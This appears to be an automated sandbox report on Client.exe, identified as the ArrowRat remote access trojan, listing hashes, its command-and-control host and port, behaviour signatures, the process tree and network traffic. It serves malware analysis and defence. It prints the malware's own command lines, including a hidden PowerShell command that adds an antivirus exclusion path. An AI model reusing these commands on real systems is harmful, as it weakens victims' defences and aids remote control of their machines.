Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
  • submitted
    26/12/2024, 16:20 UTC

General

  • Target

    Client.exe

  • Size

    158KB

  • MD5

    b9e38162af37c0f29b683c3c307fae6c

  • SHA1

    646eedd6062086bb394c5f5727ff3cfff940e090

  • SHA256

    d020ce862bf6ba26a1b4b0ca76ebc2ce9bc5ade16e52c66b11bc4253a16318a7

  • SHA512

    85440ad4b1258171ddd280e373b31ea2018538256c21ff024d138f4032bb4717875351073fd987e2c0e120f7dbea5bfc9cf32484224e2c04685a13916b8e44b5

  • SSDEEP

    3072:Mbz3H+0OoCthfbEFtbcfjF45gjryKKqH6JY2doszEmQotEPPcfPmOO8Y:Mbz3e0ODhTEPgnjuIJzo+PPcfPmB8

Malware Config

Extracted

Family

arrowrat

Botnet

Client

C2

24.ip.gl.ply.gg:46885

Mutex

BVCkbzdsT

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

  • Arrowrat family
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell with the display window hidden.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 37 IoCs
  • Suspicious use of FindShellTrayWindow 49 IoCs
  • Suspicious use of SendNotifyMessage 21 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Client.exe
    "C:\Users\Admin\AppData\Local\Temp\Client.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2256
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      2⤵
      • Boot or Logon Autostart Execution: Active Setup
      • Enumerates connected drives
      • Checks SCSI registry key(s)
      • Modifies registry class
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:2588
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 24.ip.gl.ply.gg 46885 BVCkbzdsT
      2⤵
      PID:3740
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 24.ip.gl.ply.gg 46885 BVCkbzdsT
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2076
      • C:\Windows\System32\ComputerDefaults.exe
        "C:\Windows\System32\ComputerDefaults.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4876
        • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
          "PowerShell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Pan\dora'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1056
    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:1260
    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:4300

    Network

    • DNS (US)
      241.150.49.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      241.150.49.20.in-addr.arpa
      IN PTR
      Response
    • DNS (US)
      181.129.81.91.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      181.129.81.91.in-addr.arpa
      IN PTR
      Response
    • DNS (US)
      24.ip.gl.ply.gg
      cvtres.exe
      Remote address:
      8.8.8.8:53
      Request
      24.ip.gl.ply.gg
      IN A
      Response
      24.ip.gl.ply.gg
      IN A
      147.185.221.24
    • DNS (US)
      24.221.185.147.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      24.221.185.147.in-addr.arpa
      IN PTR
      Response
    • DNS (US)
      23.159.190.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      23.159.190.20.in-addr.arpa
      IN PTR
      Response
    • DNS (US)
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • DNS (US)
      104.219.191.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      104.219.191.52.in-addr.arpa
      IN PTR
      Response
    • DNS (US)
      196.249.167.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      196.249.167.52.in-addr.arpa
      IN PTR
      Response
    • DNS (US)
      50.23.12.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      50.23.12.20.in-addr.arpa
      IN PTR
      Response
    • DNS (US)
      241.42.69.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      241.42.69.40.in-addr.arpa
      IN PTR
      Response
    • DNS (US)
      92.12.20.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      92.12.20.2.in-addr.arpa
      IN PTR
      Response
      92.12.20.2.in-addr.arpa
      IN PTR
      a2-20-12-92.deploy.static.akamaitechnologies.com
    • DNS (US)
      81.144.22.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      81.144.22.2.in-addr.arpa
      IN PTR
      Response
      81.144.22.2.in-addr.arpa
      IN PTR
      a2-22-144-81.deploy.static.akamaitechnologies.com
    • DNS (US)
      172.210.232.199.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      172.210.232.199.in-addr.arpa
      IN PTR
      Response
    • DNS (US)
      19.229.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      19.229.111.52.in-addr.arpa
      IN PTR
      Response
    • 147.185.221.24:46885
      24.ip.gl.ply.gg
      cvtres.exe
      410 B
      236 B
      5
      5
    • 147.185.221.24:46885
      24.ip.gl.ply.gg
      cvtres.exe
      410 B
      236 B
      5
      5
    • 147.185.221.24:46885
      24.ip.gl.ply.gg
      cvtres.exe
      410 B
      236 B
      5
      5
    • 147.185.221.24:46885
      24.ip.gl.ply.gg
      cvtres.exe
      502 B
      276 B
      7
      6
    • 147.185.221.24:46885
      24.ip.gl.ply.gg
      cvtres.exe
      3.3kB
      17.2kB
      67
      66
    • 8.8.8.8:53
      241.150.49.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      241.150.49.20.in-addr.arpa

    • 8.8.8.8:53
      181.129.81.91.in-addr.arpa
      dns
      72 B
      147 B
      1
      1

      DNS Request

      181.129.81.91.in-addr.arpa

    • 8.8.8.8:53
      24.ip.gl.ply.gg
      dns
      cvtres.exe
      61 B
      77 B
      1
      1

      DNS Request

      24.ip.gl.ply.gg

      DNS Response

      147.185.221.24

    • 8.8.8.8:53
      24.221.185.147.in-addr.arpa
      dns
      73 B
      130 B
      1
      1

      DNS Request

      24.221.185.147.in-addr.arpa

    • 8.8.8.8:53
      23.159.190.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      23.159.190.20.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
      144 B
      1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      104.219.191.52.in-addr.arpa
      dns
      73 B
      147 B
      1
      1

      DNS Request

      104.219.191.52.in-addr.arpa

    • 8.8.8.8:53
      196.249.167.52.in-addr.arpa
      dns
      73 B
      147 B
      1
      1

      DNS Request

      196.249.167.52.in-addr.arpa

    • 8.8.8.8:53
      50.23.12.20.in-addr.arpa
      dns
      70 B
      156 B
      1
      1

      DNS Request

      50.23.12.20.in-addr.arpa

    • 8.8.8.8:53
      241.42.69.40.in-addr.arpa
      dns
      71 B
      145 B
      1
      1

      DNS Request

      241.42.69.40.in-addr.arpa

    • 8.8.8.8:53
      92.12.20.2.in-addr.arpa
      dns
      69 B
      131 B
      1
      1

      DNS Request

      92.12.20.2.in-addr.arpa

    • 8.8.8.8:53
      81.144.22.2.in-addr.arpa
      dns
      70 B
      133 B
      1
      1

      DNS Request

      81.144.22.2.in-addr.arpa

    • 8.8.8.8:53
      172.210.232.199.in-addr.arpa
      dns
      74 B
      128 B
      1
      1

      DNS Request

      172.210.232.199.in-addr.arpa

    • 8.8.8.8:53
      19.229.111.52.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      19.229.111.52.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133797036470114333.txt

      Filesize

      75KB

      MD5

      75782663c3b084f4bb097e6cb088009a

      SHA1

      2909c4df6dcaf558439f892ab0ef5ebd2937ee76

      SHA256

      3cbd83a0b4f633144075b007ae1366eb2636c389fddc240c483de96a66340e60

      SHA512

      9c702a3014a80b7d42d9662e2eb9c24df1a4cf60c920e95c0c4d543ad83cb80b414710920d3bb0cd7dd0193ad66455f267660a698dd4edcc20035b26467c8256

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_axgtqagc.ou5.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\temp0923

      Filesize

      10B

      MD5

      bf12ed71b468aff29171838e05b5ff68

      SHA1

      bc5fa6b614279570e6eb10dd7d68e56d8d5b955e

      SHA256

      c6413eb4d233caa14215d0cefc029f1063be03765e5f2f52bd6638ab8da00506

      SHA512

      9d09dd93ec4fe7e4e63b79fe607de534b7977d8e53cbcef7ba199b421e14734c50dfcfae18101f21de9a10c774eec4456852b8c67f74fb36d7a3f2f6fb8cc33b

    • memory/1056-25-0x000001FC43A90000-0x000001FC43AB2000-memory.dmp

      Filesize

      136KB

    • memory/1056-28-0x000001FC43B60000-0x000001FC43D7C000-memory.dmp

      Filesize

      2.1MB

    • memory/2076-6-0x0000000006160000-0x0000000006704000-memory.dmp

      Filesize

      5.6MB

    • memory/2076-2-0x0000000000400000-0x0000000000418000-memory.dmp

      Filesize

      96KB

    • memory/2076-10-0x0000000006810000-0x0000000006860000-memory.dmp

      Filesize

      320KB

    • memory/2076-5-0x00000000057F0000-0x000000000588C000-memory.dmp

      Filesize

      624KB

    • memory/2076-4-0x0000000005750000-0x00000000057E2000-memory.dmp

      Filesize

      584KB

    • memory/2076-7-0x0000000005F60000-0x0000000005FC6000-memory.dmp

      Filesize

      408KB

    • memory/2256-15-0x00007FF8BCC80000-0x00007FF8BD741000-memory.dmp

      Filesize

      10.8MB

    • memory/2256-0-0x00007FF8BCC83000-0x00007FF8BCC85000-memory.dmp

      Filesize

      8KB

    • memory/2256-1-0x000001B7F9D40000-0x000001B7F9D6E000-memory.dmp

      Filesize

      184KB

    • memory/2256-203-0x00007FF8BCC80000-0x00007FF8BD741000-memory.dmp

      Filesize

      10.8MB

    • memory/2588-32-0x0000000003230000-0x0000000003231000-memory.dmp

      Filesize

      4KB

    • memory/4300-50-0x000001B536F40000-0x000001B536F60000-memory.dmp

      Filesize

      128KB

    • memory/4300-35-0x000001B536000000-0x000001B536100000-memory.dmp

      Filesize

      1024KB

    • memory/4300-33-0x000001B536000000-0x000001B536100000-memory.dmp

      Filesize

      1024KB

    • memory/4300-38-0x000001B536F80000-0x000001B536FA0000-memory.dmp

      Filesize

      128KB

    • memory/4300-65-0x000001B537350000-0x000001B537370000-memory.dmp

      Filesize

      128KB

    • memory/4300-34-0x000001B536000000-0x000001B536100000-memory.dmp

      Filesize

      1024KB